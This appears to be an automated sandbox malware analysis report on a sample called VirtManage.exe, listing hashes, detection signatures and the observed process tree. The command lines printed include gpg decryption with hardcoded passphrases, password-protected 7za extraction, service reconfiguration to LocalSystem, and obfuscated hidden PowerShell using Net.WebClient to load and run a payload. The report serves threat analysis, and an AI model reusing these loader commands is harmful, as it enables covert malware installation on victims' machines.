Edit tour
Windows
Analysis Report
VirtManage.exe
Overview
General Information
| Sample name: | VirtManage.exe |
| Analysis ID: | 1632485 |
| MD5: | 582b28a61d76e50d86c4b17dee4a9f42 |
| SHA1: | 762195d453f50d58f882e0d19ce6ae4b50f414bf |
| SHA256: | 5f79572d35507c591a773925b8786c6caea69b19ef164b305d71070caf976707 |
| Tags: | exeFORTUNEPRINTCENTRELIMITEDuser-SquiblydooBlog |
| Infos: |  |
 | |
Detection
| Score: | 46 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Compliance
| Score: | 33 |
| Range: | 0 - 100 |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains a domain name check
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
VirtManage.exe (PID: 7068 cmdline: "C:\Users\ user\Deskt op\VirtMan age.exe" MD5: 582B28A61D76E50D86C4B17DEE4A9F42) 
gpg.exe (PID: 7136 cmdline: C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \tools.7z --decrypt C:\Program Data\Micro soft\Micro softAPI\5F ILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) 
conhost.exe (PID: 7144 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - gpg.exe (PID: 6356 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \7za.exe - -decrypt C :\ProgramD ata\Micros oft\Micros oftAPI\2FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) - conhost.exe (PID: 6380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
7za.exe (PID: 6516 cmdline: C:\Program Data\Micro soft\Micro softAPI\7z a x C:\Pro gramData\M icrosoft\M icrosoftAP I\tools.7z -pJerx#sd qWE45 -oC: \ProgramDa ta\Microso ft\Microso ftAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356) - conhost.exe (PID: 6536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
msiexec.exe (PID: 6756 cmdline: msiexec.ex e /i "C:\P rogramData \Microsoft \Microsoft API\RVTool s.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF) - gpg.exe (PID: 6804 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \Cert.txt --decrypt C:\Program Data\Micro soft\Micro softAPI\3F ILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) - conhost.exe (PID: 6796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - gpg.exe (PID: 5776 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \UpdateFul l.7z --dec rypt C:\Pr ogramData\ Microsoft\ MicrosoftA PI\4FILE.1 A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) - conhost.exe (PID: 3700 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - 7za.exe (PID: 5692 cmdline:
C:\Program Data\Micro soft\Micro softAPI\7z a x C:\Pro gramData\M icrosoft\M icrosoftAP I\UpdateFu ll.7z -pTG 98HJerxsdq WE45 -oC:\ ProgramDat a\Microsof t\Microsof tAPI MD5: C58A4193BAC738B1A88ACAD9C6A57356) - conhost.exe (PID: 5852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 6892 cmdline:
sc config msdtc star t= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - conhost.exe (PID: 6880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 6156 cmdline:
sc config msdtc obj= "LocalSys tem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - conhost.exe (PID: 4172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
winapi.exe (PID: 3708 cmdline: C:\Program Data\Micro soft\Micro softAPI\wi napi.exe MD5: ADB9B72679B88DDE1749E0A438222156) 
powershell.exe (PID: 5372 cmdline: powershell .exe -wind owstyle Hi dden -comm and "SV 5p W $('C:\Pr ogr'+'amDa ta\Micr'+' osoft\Micr o'+'softAP I\ieQ'+'u4 aeD'+'3u.t ');Set-Ite m Variable :\Sh 'Net. WebClient' ;dir rid*; Set-Variab le 7 (.(It em Variabl e:\*uti*t) .Value.((( Item Varia ble:\*uti* t).Value|G M)[6].Name ).(((Item Variable:\ *uti*t).Va lue.(((Ite m Variable :\*uti*t). Value|GM)[ 6].Name)|G M|Where-Ob ject{(Vari able _ -Va lueO).Name -clike'*dl *t'}).Name ).Invoke(( Item Varia ble:\*uti* t).Value.( ((Item Var iable:\*ut i*t).Value |GM)[6].Na me).(((Ite m Variable :\*uti*t). Value.(((I tem Variab le:\*uti*t ).Value|GM )[6].Name) .PsObject. Methods|Wh ere-Object {(Variable _ -ValueO ).Name-cli ke'*nd*e'} ).Name).In voke('N*ct ',1,$TRUE) )(GV Sh).V alue);Set- Variable G PW ((((Var iable 7).V alue|GM)|W here-Objec t{(Variabl e _ -Value O).Name-cl ike'D*g'}) .Name);.(G et-Command *e-*press *)((Variab le 7).Valu e.((GCI Va riable:/GP W).Value). Invoke((GV 5pW -Valu eO)))" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5200 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 2928 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\0dxyzz ew\0dxyzze w.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 4112 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES6C81.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\0dx yzzew\CSCE 714EBFE583 744818A727 5BE9DF94CC 1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - whoami.exe (PID: 5152 cmdline:
"C:\Window s\system32 \whoami.ex e" MD5: A4A6924F3EAF97981323703D38FD99C4) - svchost.exe (PID: 5776 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - SgrmBroker.exe (PID: 5692 cmdline:
C:\Windows \system32\ SgrmBroker .exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
- gpg.exe (PID: 6184 cmdline:
C:\Program Data\Micro soft\Micro softAPI\gp g.exe --pa ssphrase " 12345678" --batch -- yes --outp ut C:\Prog ramData\Mi crosoft\Mi crosoftAPI \7za.dll - -decrypt C :\ProgramD ata\Micros oft\Micros oftAPI\1FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
- msiexec.exe (PID: 5308 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 2144 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 7BA8783 1A94E96067 AD1C39369A C7469 C MD5: 9D09DC1EDA745A5F87553048E57620CF) 
WmiPrvSE.exe (PID: 6184 cmdline: C:\Windows \sysWOW64\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
- winapi.exe (PID: 6888 cmdline:
"C:\Progra mData\Micr osoft\Upda teDesktop\ winapi.exe " MD5: ADB9B72679B88DDE1749E0A438222156) - powershell.exe (PID: 6328 cmdline:
powershell .exe -wind owstyle Hi dden -comm and "SI Va riable:zX 'Net.WebCl ient';Set- Variable G 8E $('C:\P ro'+'gramD at'+'a\Mic ro'+'soft\ Update'+'D esktop\eep 6d'+'i0uGu .t');dir r id*;Set-Va riable kAl (.$Execut ionContext .InvokeCom mand.(($Ex ecutionCon text.Invok eCommand.P sObject.Me thods|Wher e-Object{( Get-Item V ariable:/_ ).Value.Na me-ilike'G *d'}).Name ).Invoke($ ExecutionC ontext.Inv okeCommand .GetComman dName('N*- O*',1,1),[ System.Man agement.Au tomation.C ommandType s]::Cmdlet )(GI Varia ble:\zX).V alue);Set- Item Varia ble:/75 (( ((DIR Vari able:\kAl) .Value|Mem ber)|Where -Object{(G et-Item Va riable:/_) .Value.Nam e-ilike'D* g'}).Name) ;$Executio nContext|F orEach{(Ge t-Item Var iable:/_). Value.Invo keCommand. (($Executi onContext. InvokeComm and|Member |Where-Obj ect{(Get-I tem Variab le:/_).Val ue.Name-il ike'*ke*pt '}).Name). Invoke((DI R Variable :\kAl).Val ue.((GV 75 -Va)).Inv oke((Child Item Varia ble:/G8E). Value))}" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 996 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\jvshsz ob.cmdline " MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 1796 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES1217.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC C94B61069A 254E398AE8 B2B386E749 A2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - whoami.exe (PID: 3488 cmdline:
"C:\Window s\system32 \whoami.ex e" MD5: A4A6924F3EAF97981323703D38FD99C4)
- cleanup
⊘No configs have been found
⊘No yara matches
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||